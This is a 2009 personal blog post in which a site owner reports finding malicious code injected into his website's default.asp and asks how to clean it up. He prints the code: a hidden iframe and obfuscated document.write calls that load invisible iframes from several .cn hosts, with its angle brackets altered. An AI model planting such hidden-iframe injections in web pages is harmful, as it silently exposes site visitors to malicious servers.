Wednesday, October 21, 2009

How I got rid of malware "attack site" code

How I got rid of malware "attack site" code


My website http://www.arthurhu.com/ is hosted on oneandone, and I upload to it using ftp. If you use Firefox or chrome, going to the site will send you to a "attack website" warning. Nobody ever got hurt as far as I know, but it scares people away.

Somehow, somebody stuck this code in default.asp:

(iframe height="1" src="http://updeit.com/" width="1"](/iframe](script]


document.write("("+ "iframe"+ " "+ "s"+ "rc="+ "h"+ "t"+ "t"+ "p"+ ":"+ "/"+ "/"+ "ze"+ "n"+ "i"+ "t"+ "ch"+ "ampi"+ "on."+ "c"+ "n/n"+ "ic/"+ "main"+ ".ph"+ "p "+ "hei"+ "gh"+ "t"+ "="+ "2"+ " w"+ "idth=1]"+ "(/i"+ "f"+ "rame"+ "]");

(/script](script]

document.write("(iframe"+ " s"+ "rc='htt"+ "p://"+ "z"+ "enit"+ "champion"+ ".c"+ "n/nic/"+ "main.p"+ "hp' height="+ "2 width=1](/iframe]");

(/script](script]

document.write("(" +"i"+ "fr"+ "ame"+ " s" +"r"+"c"+"=h"+ "t"+"t" +"p"+ ":" +"//vi"+ "p"+"pr"+ "o"+"j"+ "e" +"c" +"t"+"s."+ "c" +"n" +"/ "+"h" +"ei"+"g"+ "h"+ "t"+ "=" +"1"+ " wi"+ "d" +"th=" +"1](/i" +"f"+ "ra"+"m"+"e]");

(/script](script]

document.write("(i"+ "f"+"rame "+"s" +"rc=ht"+ "t"+"p:"+ "//"+"u"+"p" +"da"+"tedat"+ "e.cn/ "+ "hei" +"g"+"ht" +"="+"1" +" " +"width=1]"+ "(" +"/" +"if"+"rame]");

(/script](script]

document.write("(if"+"r" +"a" +"m" +"e" +" "+"s"+"rc="+"ht"+"tp:/" +"/"+"u" +"p" +"d" +"a"+"t" +"ed" +"at" +"e." +"cn" +"/ " +"h" +"eig" +"ht"+"=" +"1 " +"w" +"idth" +"=" +"1]" +"(/if"+"ra" +"me"+"]");

(/script](br /]



Looks like it wants to create something with http://updatedate.cn/ in it (DON'T CLICK THERE!)
I used CuteFTP Pro 8.0 to look at the directory and found a few files modified Aug 2009, most of the files haven't changed since the 1990s. So most of the files that had new dates had this code, or something similar to it. The tech support said that usually it's code injected with a form or database, but it's just static hand-coded html that I use. Hopefully, changing the ftp password will fix the problem.
 
Anybody else got ideas of how to keep a website clear of this stuff? Anybody knows how this malware is supposed to work based on this injected code?


Posted by at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)